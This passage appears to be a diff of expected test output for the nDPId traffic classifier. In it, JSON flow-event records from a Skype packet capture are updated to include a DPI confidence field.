+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970687670,"flow_last_seen":1431970700698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970687670,"flow_last_seen":1431970700698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
